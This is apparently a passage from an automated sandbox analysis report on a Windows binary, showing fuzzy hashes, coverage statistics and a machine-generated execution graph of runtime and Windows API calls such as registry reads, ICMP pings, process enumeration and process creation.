                                                      • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                      • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.9%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:75
                                                      execution_graph 98267 121016 98272 135ce7 98267->98272 98282 140fe6 98272->98282 98274 135cef 98275 12101b 98274->98275 98292 135f39 98274->98292 98279 142f70 98275->98279 98382 142e74 98279->98382 98281 121025 98286 140fee 98282->98286 98284 141008 98284->98274 98286->98284 98287 14100c std::exception::exception 98286->98287 98320 14593c 98286->98320 98337 1435d1 DecodePointer 98286->98337 98338 1487cb RaiseException 98287->98338 98289 141036 98339 148701 58 API calls _free 98289->98339 98291 141048 98291->98274 98293 135f42 98292->98293 98294 135cfb 98292->98294 98295 142f70 __cinit 67 API calls 98293->98295 98296 135d13 98294->98296 98295->98294 98348 131207 98296->98348 98300 135d6e 98309 135d9b 98300->98309 98366 131981 98300->98366 98302 135d8f 98370 13133d 98302->98370 98304 135e00 GetCurrentProcess IsWow64Process 98305 135e19 98304->98305 98307 135e98 GetSystemInfo 98305->98307 98308 135e2f 98305->98308 98306 171098 98310 135e65 98307->98310 98362 1355f0 98308->98362 98309->98304 98309->98306 98310->98275 98313 135e41 98316 1355f0 2 API calls 98313->98316 98314 135e8c GetSystemInfo 98315 135e56 98314->98315 98315->98310 98317 135e5c FreeLibrary 98315->98317 98318 135e49 GetNativeSystemInfo 98316->98318 98317->98310 98318->98315 98321 1459b7 98320->98321 98334 145948 98320->98334 98346 1435d1 DecodePointer 98321->98346 98323 1459bd 98347 148d58 58 API calls __getptd_noexit 98323->98347 98324 145953 98324->98334 98340 14a39b 58 API calls 2 library calls 98324->98340 98341 14a3f8 58 API calls 8 library calls 98324->98341 98342 1432cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98324->98342 98327 14597b RtlAllocateHeap 98327->98334 98336 1459af 98327->98336 98329 1459a3 98344 148d58 58 API calls __getptd_noexit 98329->98344 98333 1459a1 98345 148d58 58 API calls __getptd_noexit 98333->98345 98334->98324 98334->98327 98334->98329 98334->98333 98343 1435d1 DecodePointer 98334->98343 98336->98286 98337->98286 98338->98289 98339->98291 98340->98324 98341->98324 98343->98334 98344->98333 98345->98336 98346->98323 98347->98336 98349 140fe6 Mailbox 59 API calls 98348->98349 98350 131228 98349->98350 98351 140fe6 Mailbox 59 API calls 98350->98351 98352 131236 GetVersionExW 98351->98352 98353 131821 98352->98353 98354 13189a 98353->98354 98355 13182d __wsetenvp 98353->98355 98356 131981 59 API calls 98354->98356 98357 131843 98355->98357 98358 131868 98355->98358 98361 13184b _memmove 98356->98361 98374 131b7c 59 API calls Mailbox 98357->98374 98375 131c7e 98358->98375 98361->98300 98363 135619 98362->98363 98364 1355f9 LoadLibraryA 98362->98364 98363->98313 98363->98314 98364->98363 98365 13560a GetProcAddress 98364->98365 98365->98363 98367 13198f 98366->98367 98369 131998 _memmove 98366->98369 98367->98369 98378 131aa4 98367->98378 98369->98302 98371 13134b 98370->98371 98372 131981 59 API calls 98371->98372 98373 13135b 98372->98373 98373->98309 98374->98361 98376 140fe6 Mailbox 59 API calls 98375->98376 98377 131c88 98376->98377 98377->98361 98379 131ab7 98378->98379 98381 131ab4 _memmove 98378->98381 98380 140fe6 Mailbox 59 API calls 98379->98380 98380->98381 98381->98369 98383 142e80 _fseek 98382->98383 98390 143447 98383->98390 98389 142ea7 _fseek 98389->98281 98407 149e3b 98390->98407 98392 142e89 98393 142eb8 DecodePointer DecodePointer 98392->98393 98394 142ee5 98393->98394 98395 142e95 98393->98395 98394->98395 98453 1489d4 59 API calls _fseek 98394->98453 98404 142eb2 98395->98404 98397 142f48 EncodePointer EncodePointer 98397->98395 98398 142ef7 98398->98397 98399 142f1c 98398->98399 98454 148a94 61 API calls __realloc_crt 98398->98454 98399->98395 98402 142f36 EncodePointer 98399->98402 98455 148a94 61 API calls __realloc_crt 98399->98455 98402->98397 98403 142f30 98403->98395 98403->98402 98456 143450 98404->98456 98408 149e4c 98407->98408 98409 149e5f EnterCriticalSection 98407->98409 98414 149ec3 98408->98414 98409->98392 98411 149e52 98411->98409 98438 1432e5 58 API calls 3 library calls 98411->98438 98415 149ecf _fseek 98414->98415 98416 149ef0 98415->98416 98417 149ed8 98415->98417 98426 149f11 _fseek 98416->98426 98442 148a4d 58 API calls 2 library calls 98416->98442 98439 14a39b 58 API calls 2 library calls 98417->98439 98419 149edd 98440 14a3f8 58 API calls 8 library calls 98419->98440 98422 149f05 98424 149f0c 98422->98424 98425 149f1b 98422->98425 98423 149ee4 98441 1432cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98423->98441 98443 148d58 58 API calls __getptd_noexit 98424->98443 98427 149e3b __lock 58 API calls 98425->98427 98426->98411 98430 149f22 98427->98430 98432 149f47 98430->98432 98433 149f2f 98430->98433 98445 142f85 98432->98445 98444 14a05b InitializeCriticalSectionAndSpinCount 98433->98444 98436 149f3b 98451 149f63 LeaveCriticalSection _doexit 98436->98451 98439->98419 98440->98423 98442->98422 98443->98426 98444->98436 98446 142f8e RtlFreeHeap 98445->98446 98447 142fb7 __dosmaperr 98445->98447 98446->98447 98448 142fa3 98446->98448 98447->98436 98452 148d58 58 API calls __getptd_noexit 98448->98452 98450 142fa9 GetLastError 98450->98447 98451->98426 98452->98450 98453->98398 98454->98399 98455->98403 98459 149fa5 LeaveCriticalSection 98456->98459 98458 142eb7 98458->98389 98459->98458 98460 121055 98465 122a19 98460->98465 98463 142f70 __cinit 67 API calls 98464 121064 98463->98464 98466 131207 59 API calls 98465->98466 98467 122a87 98466->98467 98472 121256 98467->98472 98469 122b24 98471 12105a 98469->98471 98475 1213f8 59 API calls 2 library calls 98469->98475 98471->98463 98476 121284 98472->98476 98475->98469 98477 121275 98476->98477 98478 121291 98476->98478 98477->98469 98478->98477 98479 121298 RegOpenKeyExW 98478->98479 98479->98477 98480 1212b2 RegQueryValueExW 98479->98480 98481 1212d3 98480->98481 98482 1212e8 RegCloseKey 98480->98482 98481->98482 98482->98477 98483 125ff5 98500 125ede Mailbox _memmove 98483->98500 98484 140fe6 59 API calls Mailbox 98484->98500 98485 126a9b 98768 12a9de 299 API calls 98485->98768 98488 15eff9 98788 125190 59 API calls Mailbox 98488->98788 98490 15f007 98789 18a48d 89 API calls 4 library calls 98490->98789 98494 15efeb 98540 125569 Mailbox 98494->98540 98787 176cf1 59 API calls Mailbox 98494->98787 98495 1260e5 98496 15e137 98495->98496 98503 1263bd Mailbox 98495->98503 98509 126abc 98495->98509 98514 126152 Mailbox 98495->98514 98496->98503 98769 177aad 59 API calls 98496->98769 98500->98484 98500->98485 98500->98488 98500->98490 98500->98495 98500->98509 98500->98540 98553 1253b0 98500->98553 98724 19c355 98500->98724 98767 12523c 59 API calls 98500->98767 98772 131c9c 98500->98772 98776 187f11 59 API calls Mailbox 98500->98776 98777 131a36 98500->98777 98781 176cf1 59 API calls Mailbox 98500->98781 98501 140fe6 Mailbox 59 API calls 98506 1263d1 98501->98506 98503->98501 98512 126426 98503->98512 98507 1263de 98506->98507 98506->98509 98510 126413 98507->98510 98511 15e172 98507->98511 98786 18a48d 89 API calls 4 library calls 98509->98786 98510->98512 98541 125447 Mailbox 98510->98541 98770 19c87c 85 API calls 2 library calls 98511->98770 98771 19c9c9 95 API calls Mailbox 98512->98771 98514->98494 98514->98509 98530 15e2e9 VariantClear 98514->98530 98514->98540 98581 195e1d 98514->98581 98606 19f1b2 98514->98606 98611 18413a 98514->98611 98614 18412a 98514->98614 98617 12cfd7 98514->98617 98636 19e60c 98514->98636 98639 12d679 98514->98639 98679 18d6be 98514->98679 98766 125190 59 API calls Mailbox 98514->98766 98782 177aad 59 API calls 98514->98782 98517 15e19d 98517->98517 98518 15f165 98791 18a48d 89 API calls 4 library calls 98518->98791 98519 15e691 98783 18a48d 89 API calls 4 library calls 98519->98783 98524 140fe6 59 API calls Mailbox 98524->98541 98525 15e6a0 98526 1269fa 98528 131c9c 59 API calls 98526->98528 98527 15ea9a 98533 131c9c 59 API calls 98527->98533 98528->98540 98530->98514 98531 131c9c 59 API calls 98531->98541 98533->98540 98534 1269ff 98534->98518 98534->98519 98535 131207 59 API calls 98535->98541 98536 177aad 59 API calls 98536->98541 98537 142f70 67 API calls __cinit 98537->98541 98538 15eb67 98538->98540 98784 177aad 59 API calls 98538->98784 98541->98519 98541->98524 98541->98526 98541->98527 98541->98531 98541->98534 98541->98535 98541->98536 98541->98537 98541->98538 98541->98540 98542 15ef28 98541->98542 98544 125a1a 98541->98544 98764 127e50 299 API calls 2 library calls 98541->98764 98765 126e30 60 API calls Mailbox 98541->98765 98785 18a48d 89 API calls 4 library calls 98542->98785 98790 18a48d 89 API calls 4 library calls 98544->98790 98554 1253cf 98553->98554 98575 1253fd Mailbox 98553->98575 98555 140fe6 Mailbox 59 API calls 98554->98555 98555->98575 98556 1269fa 98557 131c9c 59 API calls 98556->98557 98577 125569 Mailbox 98557->98577 98558 177aad 59 API calls 98558->98575 98559 1269ff 98560 15f165 98559->98560 98561 15e691 98559->98561 98798 18a48d 89 API calls 4 library calls 98560->98798 98794 18a48d 89 API calls 4 library calls 98561->98794 98562 131207 59 API calls 98562->98575 98566 140fe6 59 API calls Mailbox 98566->98575 98567 15e6a0 98567->98500 98568 131c9c 59 API calls 98568->98575 98569 15ea9a 98571 131c9c 59 API calls 98569->98571 98571->98577 98573 15eb67 98573->98577 98795 177aad 59 API calls 98573->98795 98574 142f70 67 API calls __cinit 98574->98575 98575->98556 98575->98558 98575->98559 98575->98561 98575->98562 98575->98566 98575->98568 98575->98569 98575->98573 98575->98574 98575->98577 98578 15ef28 98575->98578 98580 125a1a 98575->98580 98792 127e50 299 API calls 2 library calls 98575->98792 98793 126e30 60 API calls Mailbox 98575->98793 98577->98500 98796 18a48d 89 API calls 4 library calls 98578->98796 98797 18a48d 89 API calls 4 library calls 98580->98797 98582 195e46 98581->98582 98583 195e74 WSAStartup 98582->98583 98830 12502b 98582->98830 98584 195e9d 98583->98584 98589 195e88 Mailbox 98583->98589 98799 1340cd 98584->98799 98587 195e61 98587->98583 98591 12502b 59 API calls 98587->98591 98589->98514 98593 195e70 98591->98593 98593->98583 98595 195ebf inet_addr gethostbyname 98595->98589 98596 195edd IcmpCreateFile 98595->98596 98596->98589 98597 195f01 98596->98597 98598 140fe6 Mailbox 59 API calls 98597->98598 98599 195f1a 98598->98599 98834 13433f 98599->98834 98602 195f55 IcmpSendEcho 98604 195f6d 98602->98604 98603 195f34 IcmpSendEcho 98603->98604 98605 195fd4 IcmpCloseHandle WSACleanup 98604->98605 98605->98589 98607 124d37 84 API calls 98606->98607 98608 19f1cf 98607->98608 98842 184148 CreateToolhelp32Snapshot Process32FirstW 98608->98842 98610 19f1de 98610->98514 98959 18494a GetFileAttributesW 98611->98959 98615 18494a 3 API calls 98614->98615 98616 184131 98615->98616 98616->98514 98618 124d37 84 API calls 98617->98618 98619 12d001 98618->98619 98963 125278 98619->98963 98621 12d018 98622 12d57b 98621->98622 98623 12502b 59 API calls 98621->98623 98631 12d439 Mailbox __wsetenvp 98621->98631 98622->98514 98623->98631 98626 124f98 59 API calls 98626->98631 98628 140c65 62 API calls 98628->98631 98630 124d37 84 API calls 98630->98631 98631->98622 98631->98626 98631->98628 98631->98630 98632 131821 59 API calls 98631->98632 98635 12502b 59 API calls 98631->98635 98968 14312d 98631->98968 98978 1359d3 98631->98978 98989 135ac3 98631->98989 98993 13162d 98631->98993 98998 13153b 59 API calls 2 library calls 98631->98998 98999 124f3c 59 API calls Mailbox 98631->98999 98632->98631 98635->98631 99052 19d1c6 98636->99052 98638 19e61c 98638->98514 99162 124f98 98639->99162 98643 140fe6 Mailbox 59 API calls 98644 12d6aa 98643->98644 98647 12d6ba 98644->98647 99192 133df7 60 API calls Mailbox 98644->99192 98645 12d6df 98651 12502b 59 API calls 98645->98651 98654 12d6ec 98645->98654 98646 165068 98646->98645 99212 18fbb7 59 API calls 98646->99212 98649 124d37 84 API calls 98647->98649 98650 12d6c8 98649->98650 99193 133e47 98650->99193 98653 1650b0 98651->98653 98653->98654 98655 1650b8 98653->98655 99175 1341d6 98654->99175 98657 12502b 59 API calls 98655->98657 98660 12d6f3 98657->98660 98661 1650ca 98660->98661 98662 12d70d 98660->98662 98663 140fe6 Mailbox 59 API calls 98661->98663 98664 131207 59 API calls 98662->98664 98665 1650d0 98663->98665 98666 12d715 98664->98666 98667 1650e4 98665->98667 99180 133ea1 98665->99180 99204 133b7b 65 API calls Mailbox 98666->99204 98673 1650e8 _memmove 98667->98673 99183 187c7f 98667->99183 98669 12d724 98669->98673 99205 124f3c 59 API calls Mailbox 98669->99205 98674 12d738 Mailbox 98675 12d772 98674->98675 99206 1342cf 98674->99206 98675->98514 98680 18d6dd 98679->98680 98681 18d6e8 98679->98681 98682 12502b 59 API calls 98680->98682 98684 131207 59 API calls 98681->98684 98722 18d7c2 Mailbox 98681->98722 98682->98681 98683 140fe6 Mailbox 59 API calls 98685 18d80b 98683->98685 98686 18d70c 98684->98686 98691 18d817 98685->98691 99267 133df7 60 API calls Mailbox 98685->99267 98687 131207 59 API calls 98686->98687 98690 18d715 98687->98690 98689 124d37 84 API calls 98692 18d82f 98689->98692 98693 124d37 84 API calls 98690->98693 98691->98689 98694 133e47 67 API calls 98692->98694 98695 18d721 98693->98695 98696 18d83e 98694->98696 98697 140119 59 API calls 98695->98697 98698 18d842 GetLastError 98696->98698 98699 18d876 98696->98699 98700 18d736 98697->98700 98701 18d85b 98698->98701 98703 18d8d8 98699->98703 98704 18d8a1 98699->98704 98702 1317e0 59 API calls 98700->98702 98721 18d7cb Mailbox 98701->98721 99268 133f0b CloseHandle 98701->99268 98705 18d769 98702->98705 98707 140fe6 Mailbox 59 API calls 98703->98707 98706 140fe6 Mailbox 59 API calls 98704->98706 98711 18412a 3 API calls 98705->98711 98723 18d793 Mailbox 98705->98723 98708 18d8a6 98706->98708 98712 18d8dd 98707->98712 98713 18d8b7 98708->98713 98716 131207 59 API calls 98708->98716 98710 12502b 59 API calls 98710->98722 98714 18d779 98711->98714 98715 131207 59 API calls 98712->98715 98712->98721 99269 18fc0d 59 API calls 2 library calls 98713->99269 98718 131a36 59 API calls 98714->98718 98714->98723 98715->98721 98716->98713 98719 18d78a 98718->98719 99255 183f1d 98719->99255 98721->98514 98722->98683 98722->98721 98723->98710 98725 19c39a 98724->98725 98726 19c380 98724->98726 99270 19a8fd 98725->99270 99297 18a48d 89 API calls 4 library calls 98726->99297 98730 1253b0 298 API calls 98731 19c406 98730->98731 98732 19c392 Mailbox 98731->98732 98733 19c498 98731->98733 98734 19c447 98731->98734 98732->98500 98735 19c4ee 98733->98735 98737 19c49e 98733->98737 98742 18789a 59 API calls 98734->98742 98735->98732 98736 124d37 84 API calls 98735->98736 98738 19c500 98736->98738 99298 187ed5 59 API calls 98737->99298 98740 131aa4 59 API calls 98738->98740 98743 19c524 CharUpperBuffW 98740->98743 98741 19c4c1 99299 1335b9 59 API calls Mailbox 98741->99299 98745 19c477 98742->98745 98748 19c53e 98743->98748 98747 176ebc 298 API calls 98745->98747 98746 19c4c9 Mailbox 99300 12b020 98746->99300 98747->98732 98749 19c591 98748->98749 98750 19c545 98748->98750 98751 124d37 84 API calls 98749->98751 99277 18789a 98750->99277 98753 19c599 98751->98753 99342 125376 60 API calls 98753->99342 98758 19c5a3 98758->98732 98759 124d37 84 API calls 98758->98759 98760 19c5be 98759->98760 99343 1335b9 59 API calls Mailbox 98760->99343 98762 19c5ce 98763 12b020 298 API calls 98762->98763 98763->98732 98764->98541 98765->98541 98766->98514 98767->98500 98768->98509 98769->98503 98770->98512 98771->98517 98773 131ca7 98772->98773 98774 131caf 98772->98774 99882 131bcc 59 API calls 2 library calls 98773->99882 98774->98500 98776->98500 98778 131a45 __wsetenvp _memmove 98777->98778 98779 140fe6 Mailbox 59 API calls 98778->98779 98780 131a83 98779->98780 98780->98500 98781->98500 98782->98514 98783->98525 98784->98540 98785->98544 98786->98494 98787->98540 98788->98494 98789->98494 98790->98540 98791->98540 98792->98575 98793->98575 98794->98567 98795->98577 98796->98580 98797->98577 98798->98577 98800 140fe6 Mailbox 59 API calls 98799->98800 98801 1340e0 98800->98801 98802 131c7e 59 API calls 98801->98802 98803 1340ed 98802->98803 98804 124d37 98803->98804 98805 124d51 98804->98805 98806 124d4b 98804->98806 98807 15db28 __i64tow 98805->98807 98808 124d99 98805->98808 98810 124d57 __itow 98805->98810 98814 15da2f 98805->98814 98822 13402a WideCharToMultiByte 98806->98822 98837 1438c8 83 API calls 3 library calls 98808->98837 98812 140fe6 Mailbox 59 API calls 98810->98812 98813 124d71 98812->98813 98813->98806 98816 131a36 59 API calls 98813->98816 98815 140fe6 Mailbox 59 API calls 98814->98815 98817 15daa7 Mailbox _wcscpy 98814->98817 98818 15da74 98815->98818 98816->98806 98838 1438c8 83 API calls 3 library calls 98817->98838 98819 140fe6 Mailbox 59 API calls 98818->98819 98820 15da9a 98819->98820 98820->98817 98821 131a36 59 API calls 98820->98821 98821->98817 98823 134085 98822->98823 98824 13404e 98822->98824 98840 133f20 59 API calls Mailbox 98823->98840 98826 140fe6 Mailbox 59 API calls 98824->98826 98827 134055 WideCharToMultiByte 98826->98827 98839 133f79 59 API calls 2 library calls 98827->98839 98829 134077 98829->98595 98831 125041 98830->98831 98832 12503c 98830->98832 98831->98587 98832->98831 98841 1437ba 59 API calls 98832->98841 98835 140fe6 Mailbox 59 API calls 98834->98835 98836 134351 98835->98836 98836->98602 98836->98603 98837->98810 98838->98807 98839->98829 98840->98829 98841->98831 98852 184ce2 98842->98852 98844 184244 CloseHandle 98844->98610 98845 184195 Process32NextW 98845->98844 98851 18418e Mailbox 98845->98851 98846 131207 59 API calls 98846->98851 98847 131a36 59 API calls 98847->98851 98851->98844 98851->98845 98851->98846 98851->98847 98858 140119 98851->98858 98909 1317e0 98851->98909 98918 13151f 98851->98918 98853 184d09 98852->98853 98857 184cf0 98852->98857 98922 1437c3 59 API calls __wcstoi64 98853->98922 98856 184d0f 98856->98851 98857->98853 98857->98856 98921 14385c GetStringTypeW _iswctype 98857->98921 98859 131207 59 API calls 98858->98859 98860 14012f 98859->98860 98861 131207 59 API calls 98860->98861 98862 140137 98861->98862 98863 131207 59 API calls 98862->98863 98864 14013f 98863->98864 98865 131207 59 API calls 98864->98865 98866 140147 98865->98866 98867 17627d 98866->98867 98868 14017b 98866->98868 98869 131c9c 59 API calls 98867->98869 98870 131462 59 API calls 98868->98870 98871 176286 98869->98871 98872 140189 98870->98872 98939 1319e1 98871->98939 98874 131981 59 API calls 98872->98874 98875 140193 98874->98875 98876 1401be 98875->98876 98877 131462 59 API calls 98875->98877 98878 1401fe 98876->98878 98880 1401dd 98876->98880 98891 1762a6 98876->98891 98881 1401b4 98877->98881 98923 131462 98878->98923 98936 131609 98880->98936 98885 131981 59 API calls 98881->98885 98883 14020f 98887 140221 98883->98887 98889 131c9c 59 API calls 98883->98889 98884 176376 98888 131821 59 API calls 98884->98888 98885->98876 98890 140231 98887->98890 98894 131c9c 59 API calls 98887->98894 98904 176333 98888->98904 98889->98887 98892 140238 98890->98892 98896 131c9c 59 API calls 98890->98896 98891->98884 98895 17635f 98891->98895 98902 1762dd 98891->98902 98897 131c9c 59 API calls 98892->98897 98906 14023f Mailbox 98892->98906 98893 131462 59 API calls 98893->98878 98894->98890 98895->98884 98899 17634a 98895->98899 98896->98892 98897->98906 98898 17633b 98900 131821 59 API calls 98898->98900 98901 131821 59 API calls 98899->98901 98900->98904 98901->98904 98902->98898 98907 176326 98902->98907 98903 131609 59 API calls 98903->98904 98904->98878 98904->98903 98943 13153b 59 API calls 2 library calls 98904->98943 98906->98851 98908 131821 59 API calls 98907->98908 98908->98904 98910 1317f2 98909->98910 98911 16f401 98909->98911 98945 131680 98910->98945 98951 1787f9 59 API calls _memmove 98911->98951 98914 16f40b 98916 131c9c 59 API calls 98914->98916 98915 1317fe 98915->98851 98917 16f413 Mailbox 98916->98917 98952 1314db 98918->98952 98921->98857 98922->98856 98924 131471 98923->98924 98925 1314ce 98923->98925 98924->98925 98926 13147c 98924->98926 98927 131981 59 API calls 98925->98927 98928 131497 98926->98928 98929 16f1de 98926->98929 98933 13149f _memmove 98927->98933 98944 131b7c 59 API calls Mailbox 98928->98944 98931 131c7e 59 API calls 98929->98931 98932 16f1e8 98931->98932 98934 140fe6 Mailbox 59 API calls 98932->98934 98933->98883 98935 16f208 98934->98935 98937 131aa4 59 API calls 98936->98937 98938 131614 98937->98938 98938->98878 98938->98893 98940 1319fb 98939->98940 98941 1319ee 98939->98941 98942 140fe6 Mailbox 59 API calls 98940->98942 98941->98876 98942->98941 98943->98904 98944->98933 98946 131692 98945->98946 98950 1316ba _memmove 98945->98950 98947 140fe6 Mailbox 59 API calls 98946->98947 98946->98950 98948 13176f _memmove 98947->98948 98949 140fe6 Mailbox 59 API calls 98948->98949 98949->98948 98950->98915 98951->98914 98953 1314e9 CompareStringW 98952->98953 98958 16f210 98952->98958 98956 13150c 98953->98956 98955 16f25f 98956->98851 98957 144eb8 60 API calls 98957->98958 98958->98955 98958->98957 98960 18413f 98959->98960 98961 184965 FindFirstFileW 98959->98961 98960->98514 98961->98960 98962 18497a FindClose 98961->98962 98962->98960 98964 140fe6 Mailbox 59 API calls 98963->98964 98965 125285 98964->98965 98966 125294 98965->98966 98967 131a36 59 API calls 98965->98967 98966->98621 98967->98966 98969 1431ae 98968->98969 98970 143139 98968->98970 99002 1431c0 60 API calls 3 library calls 98969->99002 98974 14315e 98970->98974 99000 148d58 58 API calls __getptd_noexit 98970->99000 98973 1431bb 98973->98631 98974->98631 98975 143145 99001 148fe6 9 API calls _fseek 98975->99001 98977 143150 98977->98631 98979 1359fe _memset 98978->98979 99003 135800 98979->99003 98981 135a83 98984 135ab9 Shell_NotifyIconW 98981->98984 98985 135a9d Shell_NotifyIconW 98981->98985 98986 135aab 98984->98986 98985->98986 99007 1356f8 98986->99007 98988 135ab2 98988->98631 98990 135b25 98989->98990 98991 135ad5 _memset 98989->98991 98990->98631 98992 135af4 Shell_NotifyIconW 98991->98992 98992->98990 98994 140fe6 Mailbox 59 API calls 98993->98994 98995 131652 98994->98995 98996 140fe6 Mailbox 59 API calls 98995->98996 98997 131660 98996->98997 98997->98631 98998->98631 98999->98631 99000->98975 99001->98977 99002->98973 99004 135810 99003->99004 99005 13581c 99003->99005 99004->98981 99037 1834dd 62 API calls _W_store_winword 99004->99037 99005->99004 99006 135821 DestroyIcon 99005->99006 99006->99004 99008 135715 99007->99008 99009 1357fa Mailbox 99007->99009 99010 13162d 59 API calls 99008->99010 99009->98988 99011 135723 99010->99011 99012 135730 99011->99012 99013 170c4c LoadStringW 99011->99013 99014 131821 59 API calls 99012->99014 99016 170c66 99013->99016 99015 135745 99014->99015 99017 135752 99015->99017 99023 170c74 99015->99023 99018 131c9c 59 API calls 99016->99018 99017->99016 99019 135760 99017->99019 99025 135778 _memset _wcscpy 99018->99025 99038 131900 99019->99038 99022 1317e0 59 API calls 99022->99025 99024 170cb7 Mailbox 99023->99024 99023->99025 99026 131207 59 API calls 99023->99026 99046 1438c8 83 API calls 3 library calls 99024->99046 99027 1357e0 Shell_NotifyIconW 99025->99027 99028 170c9e 99026->99028 99027->99009 99045 180252 60 API calls Mailbox 99028->99045 99031 170cd6 99033 131900 59 API calls 99031->99033 99032 170ca9 99034 1317e0 59 API calls 99032->99034 99035 170ce7 99033->99035 99034->99024 99036 131900 59 API calls 99035->99036 99036->99025 99037->98981 99039 16f534 99038->99039 99040 131914 99038->99040 99042 131c7e 59 API calls 99039->99042 99047 1318a5 99040->99047 99044 16f53f __wsetenvp _memmove 99042->99044 99043 13191f 99043->99022 99045->99032 99046->99031 99048 1318b4 __wsetenvp 99047->99048 99049 131c7e 59 API calls 99048->99049 99050 1318c5 _memmove 99048->99050 99051 16f4f1 _memmove 99049->99051 99050->99043 99053 124d37 84 API calls 99052->99053 99054 19d203 99053->99054 99059 19d24a Mailbox 99054->99059 99090 19de8e 99054->99090 99056 19d617 99141 19dfb1 92 API calls Mailbox 99056->99141 99059->98638 99060 19d29b Mailbox 99060->99059 99063 124d37 84 API calls 99060->99063 99078 19d4a2 99060->99078 99123 18fc0d 59 API calls 2 library calls 99060->99123 99124 19d6c8 61 API calls 2 library calls 99060->99124 99061 19d626 99062 19d4b0 99061->99062 99064 19d632 99061->99064 99103 19d057 99062->99103 99063->99060 99064->99059 99069 19d4e9 99118 140e38 99069->99118 99072 19d51c 99126 1247be 99072->99126 99073 19d503 99125 18a48d 89 API calls 4 library calls 99073->99125 99077 19d50e GetCurrentProcess TerminateProcess 99077->99072 99078->99056 99078->99062 99082 19d68d 99082->99059 99086 19d6a1 FreeLibrary 99082->99086 99083 19d554 99138 19dd32 107 API calls _free 99083->99138 99086->99059 99088 19d565 99088->99082 99139 124230 59 API calls Mailbox 99088->99139 99140 12523c 59 API calls 99088->99140 99142 19dd32 107 API calls _free 99088->99142 99091 131aa4 59 API calls 99090->99091 99092 19dea9 CharLowerBuffW 99091->99092 99143 17f903 99092->99143 99096 131207 59 API calls 99097 19dee2 99096->99097 99098 131462 59 API calls 99097->99098 99100 19def9 99098->99100 99099 19df41 Mailbox 99099->99060 99101 131981 59 API calls 99100->99101 99102 19df05 Mailbox 99101->99102 99102->99099 99150 19d6c8 61 API calls 2 library calls 99102->99150 99104 19d072 99103->99104 99108 19d0c7 99103->99108 99105 140fe6 Mailbox 59 API calls 99104->99105 99107 19d094 99105->99107 99106 140fe6 Mailbox 59 API calls 99106->99107 99107->99106 99107->99108 99109 19e139 99108->99109 99110 19e362 Mailbox 99109->99110 99114 19e15c _strcat _wcscpy __wsetenvp 99109->99114 99110->99069 99111 12502b 59 API calls 99111->99114 99112 1250d5 59 API calls 99112->99114 99113 125087 59 API calls 99113->99114 99114->99110 99114->99111 99114->99112 99114->99113 99115 14593c 58 API calls __crtCompareStringA_stat 99114->99115 99116 124d37 84 API calls 99114->99116 99151 185e42 61 API calls 2 library calls 99114->99151 99115->99114 99116->99114 99119 140e4d 99118->99119 99120 140ee5 CreateProcessW 99119->99120 99121 140eb3 99119->99121 99122 140ed3 CloseHandle 99119->99122 99120->99121 99121->99072 99121->99073 99122->99121 99123->99060 99124->99060 99125->99077 99127 1247c6 99126->99127 99128 140fe6 Mailbox 59 API calls 99127->99128 99129 1247d4 99128->99129 99130 1247e0 99129->99130 99152 1246ec 59 API calls Mailbox 99129->99152 99132 124540 99130->99132 99153 124650 99132->99153 99134 12454f 99135 140fe6 Mailbox 59 API calls 99134->99135 99136 1245eb 99134->99136 99135->99136 99136->99088 99137 124230 59 API calls Mailbox 99136->99137 99137->99083 99138->99088 99139->99088 99140->99088 99141->99061 99142->99088 99145 17f92e __wsetenvp 99143->99145 99144 17f96d 99144->99096 99144->99102 99145->99144 99148 17f963 99145->99148 99149 17fa14 99145->99149 99146 1314db 61 API calls 99146->99148 99147 1314db 61 API calls 99147->99149 99148->99144 99148->99146 99149->99144 99149->99147 99150->99099 99151->99114 99152->99130 99154 124659 Mailbox 99153->99154 99155 15d6ec 99154->99155 99160 124663 99154->99160 99156 140fe6 Mailbox 59 API calls 99155->99156 99159 15d6f8 99156->99159 99157 12466a 99157->99134 99159->99159 99160->99157 99161 125190 59 API calls Mailbox 99160->99161 99161->99160 99163 124fa8 99162->99163 99164 15dd2b 99162->99164 99168 140fe6 Mailbox 59 API calls 99163->99168 99165 15dd3c 99164->99165 99166 131821 59 API calls 99164->99166 99167 1319e1 59 API calls 99165->99167 99166->99165 99170 15dd46 99167->99170 99169 124fbb 99168->99169 99169->99170 99171 124fc6 99169->99171 99172 124fd4 99170->99172 99173 131207 59 API calls 99170->99173 99171->99172 99174 131a36 59 API calls 99171->99174 99172->98643 99172->98646 99173->99172 99174->99172 99213 13410a 99175->99213 99178 13410a 2 API calls 99179 13420b 99178->99179 99179->98660 99223 134220 99180->99223 99184 187c8a 99183->99184 99185 140fe6 Mailbox 59 API calls 99184->99185 99186 187c91 99185->99186 99187 187c9d 99186->99187 99188 187cbe 99186->99188 99189 140fe6 Mailbox 59 API calls 99187->99189 99190 140fe6 Mailbox 59 API calls 99188->99190 99191 187ca6 _memset 99189->99191 99190->99191 99191->98673 99192->98647 99194 1342cf CloseHandle 99193->99194 99195 133e53 99194->99195 99230 1342f9 99195->99230 99197 12d6d7 99197->98645 99197->98646 99211 133f0b CloseHandle 99197->99211 99198 133e72 99198->99197 99238 133c61 62 API calls Mailbox 99198->99238 99200 133e84 99239 13389f 99200->99239 99204->98669 99205->98674 99207 12d766 99206->99207 99208 1342e8 99206->99208 99207->98675 99210 133f0b CloseHandle 99207->99210 99208->99207 99209 1342ed CloseHandle 99208->99209 99209->99207 99210->98675 99211->98646 99212->98646 99214 134124 99213->99214 99215 1706cc 99214->99215 99216 1341ab SetFilePointerEx 99214->99216 99220 13417f 99214->99220 99222 1342ae SetFilePointerEx 99215->99222 99221 1342ae SetFilePointerEx 99216->99221 99219 1706e6 99220->99178 99221->99220 99222->99219 99224 134293 99223->99224 99228 13422e 99223->99228 99229 1342ae SetFilePointerEx 99224->99229 99225 133eb2 99225->98667 99227 134266 ReadFile 99227->99225 99227->99228 99228->99225 99228->99227 99229->99228 99231 134312 CreateFileW 99230->99231 99232 1706fc 99230->99232 99233 134334 99231->99233 99232->99233 99234 170702 CreateFileW 99232->99234 99233->99198 